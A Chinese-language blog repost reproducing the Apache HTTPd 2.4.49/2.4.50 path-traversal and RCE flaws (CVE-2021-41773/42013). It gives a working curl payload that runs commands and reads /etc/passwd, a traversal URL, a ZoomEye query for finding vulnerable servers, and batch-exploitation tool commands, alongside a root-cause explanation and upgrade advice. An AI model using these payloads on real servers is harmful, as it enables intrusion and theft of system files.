CVE-2021-41773 CVE-2021-42013 Apache HTTPd最新RCE漏洞复现 目录穿越漏洞
給個關注?寶兒!
給個關注?寶兒!
給個關注?寶兒!
關注公眾號:b1gpig信息安全,文章推送不錯過
CVE-2021-41773漏洞描述:
Apache HTTPd是Apache基金會開源的一款流行的HTTP服務器。2021年10月8日Apache HTTPd官方發布安全更新,披露了CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 路徑穿越漏洞。由于對CVE-2021-41773 Apache HTTPd 2.4.49 路徑穿越漏洞的修復不完善,攻擊者可構造惡意請求繞過補丁,利用穿越漏洞讀取到Web目錄之外的其他文件。同時若Apache HTTPd開啟了cgi支持,攻擊者可構造惡意請求執行命令,控制服務器。
影響版本
Apache HTTPd 2.4.49/2.4.50版本
zoomeye語法
app:“apache web server 2.4.49 2.4.50”
復現過程:
環境搭建:
docker鏡像:
https://github.com/blasty/CVE-2021-41773
搭建效果:
rce復現:
抓包:
poc:
curl:
curl --data "echo;cat /etc/passwd" 'http://ip:port/cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh'修復:
建議使用Apache HTTPd 2.4.49 與Apache HTTPd 2.4.50 版本的服務器更新Apache HTTPd 版本至最新。
批量利用檢測利用工具:
可視化界面工具
Github地址:
https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013
PocSuite3工具
批量:
python3 .\cli.py -r .\pocs\20211008_web_apache-httpd_dir-traversal-rce_cve-2021-41773_cve-2021-42013.py -f 1.txt --verifyCVE-2021-42013 目錄穿越
漏洞成因:
Apache HTTP Server 2.4.50版本對CVE-2021-41773的修復可以避免一次url編碼導致的路徑穿越,但是由于在請求處理過程中,還會調用ap_unescape_url函數對參數再次進行解碼,仍然會導致路徑穿越。
在處理外部HTTP請求時,會調用 ap_process_request_internal函數對url路徑進行處理,在該函數中,首先會調用ap_normalize_path函數進行一次url解碼,之后會調用ap_unescape_url函數進行二次解碼,代碼如下:
觸發:
ip:port/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd看完點贊關注不迷路!!! 后續繼續更新優質安全內容!!!
總結
以上是生活随笔為你收集整理的CVE-2021-41773 CVE-2021-42013 Apache HTTPd最新RCE漏洞复现 目录穿越漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 编写可靠bash脚本的一些技巧
- 下一篇: 片仔癀股票价格会涨到500以上吗 通过